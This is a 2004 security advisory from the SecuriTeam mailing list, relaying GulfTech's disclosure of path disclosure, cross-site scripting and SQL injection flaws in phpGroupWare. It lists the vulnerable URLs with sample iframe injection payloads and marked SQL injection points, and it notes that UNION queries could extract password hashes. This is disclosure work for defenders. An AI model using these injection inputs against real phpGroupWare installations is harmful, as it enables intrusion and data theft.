[UNIX] Multiple phpGroupWare Vulnerabilities (Path Disclosure, XSS, SQL Injection)
Date: 21 Dec 2004 18:47:45 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Subject: [UNIX] Multiple phpGroupWare Vulnerabilities (Path Disclosure, XSS, SQL Injection)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple phpGroupWare Vulnerabilities (Path Disclosure, XSS, SQL
Injection)
------------------------------------------------------------------------
SUMMARY
<http://www.phpgroupware.org/>; phpGroupWare (formerly known as webdistro)
is "a multi-user groupware suite written in PHP".
The phpGroupWare product has been found to contain multiple security
vulnerabilities ranging from cross site scripting to SQL injection
vulnerabilities.
DETAILS
Path Disclosure:
phpGroupWare allows for full path disclosure. This issue can take place in
more than one way. One example that will trigger the path disclosure is by
appending junk (such as metacharacters) to the end of a session id. Below
are two other examples
http://host/phpgroupware/preferences/preferences.php?appname=blah
http://host/phpgroupware/index.php?menuaction=blah
This will reveal the full physical path of the web directory, and could
possibly aid a would be attacker. The other example of path disclosure can
be triggered by specifying an invalid menu item.
Cross Site Scripting:
Cross Site Scripting takes place in multiple places in phpGroupWare.Below
are some examples.
http://host/phpgroupware/wiki/index.php?kp3=99884d8a63791f406585913d74476b11%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.post&type=new%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=202%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&forum_id=3%22%3E%3Ciframe%3E&msg=202
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=42&pos=10%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=preferences.uicategories.index&cats_app=%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=preferences.uicategories.edit&cats_app=notes&extra=
&global_cats=True&cats_level=True&cat_parent=188&cat_id=188%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=email.uimessage.message&msgball[msgnum]=1%22%3E%3Ciframe%3E
&msgball[folder]=INBOX.hello&msgball[acctnum]=0&sort=1&order=1&start=0
http://host/phpgroupware/index.php?menuaction=email.uicompose.compose&fldball[folder]=INBOX.hello
&fldball[acctnum]=0&to=%22%3E%3Ciframe%3E&personal=&sort=1&order=1&start=0
http://host/phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Ciframe%3E
These Cross Site Scripting issues could allow an attacker to possibly
gather sensitive information from a victim, and execute arbitrary client
side code in the context of the victim's browser.
SQL Injection:
phpGrouWare has several SQL Injection holes. Some are not bad, some are a
bit unorthodox, and a few are dangerous. One example of a kinda unorthodox
SQL Injection is in the Trouble Ticket system. If an attacker requests a
URL like this:
http://host/phpgroupware/tts/viewticket_details.php?ticket_id=355[SQL_QUERY]
nothing will happen, but as soon as you save the ticket you are allowed to
influence a SELECT query which could be very bad. Some more examples of
the not so dangerous SQL Injection issues are:
http://host/phpgroupware/index.php?menuaction=todo.ui.show_list&order=[SQL_QUERY]&sort=ASC&filter=
&qfield=&start=&query=
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.list_projects&order=[SQL_QUERY]
&sort=ASC&filter=&qfield=&start=&query=&pro_main=&action=mains
It should be noted that other parts of this query can be tampered with
also, such as the sort fields etc. Now for some examples of the more
dangerous issues that let you influence the query right in the middle of a
SELECT statement.
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.edit_project&pro_main=31
&action=subs&project_id=32[SQL_QUERY]
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.edit_project&pro_main=31[SQL_QUERY]
&action=subs&project_id=32
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.view_project&pro_main=31
&action=subs&project_id=32[SQL_QUERY]&domain=default
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.view_project&pro_main=31[SQL_QUERY]
&action=subs&project_id=32&domain=default&494fbb
http://host/phpgroupware/index.php?menuaction=projects.uiprojecthours.view_hours&project_id=32
&pro_parent=&action=subs&hours_id=26[SQL_QUERY]&domain=default
You can use these particular examples to UNION select info from the
database with little effort required. This can be bad when password hashes
start getting pulled by an attacker, or other sensitive data. I will
release my proof of concepts for phpGroupWare once the updated version is
available.
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@gulftech.org.>
GulfTech Security.
The original article can be found at:
<http://www.gulftech.org/?node=research&article_id=00054-12142004>;
http://www.gulftech.org/?node=research&article_id=00054-12142004
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
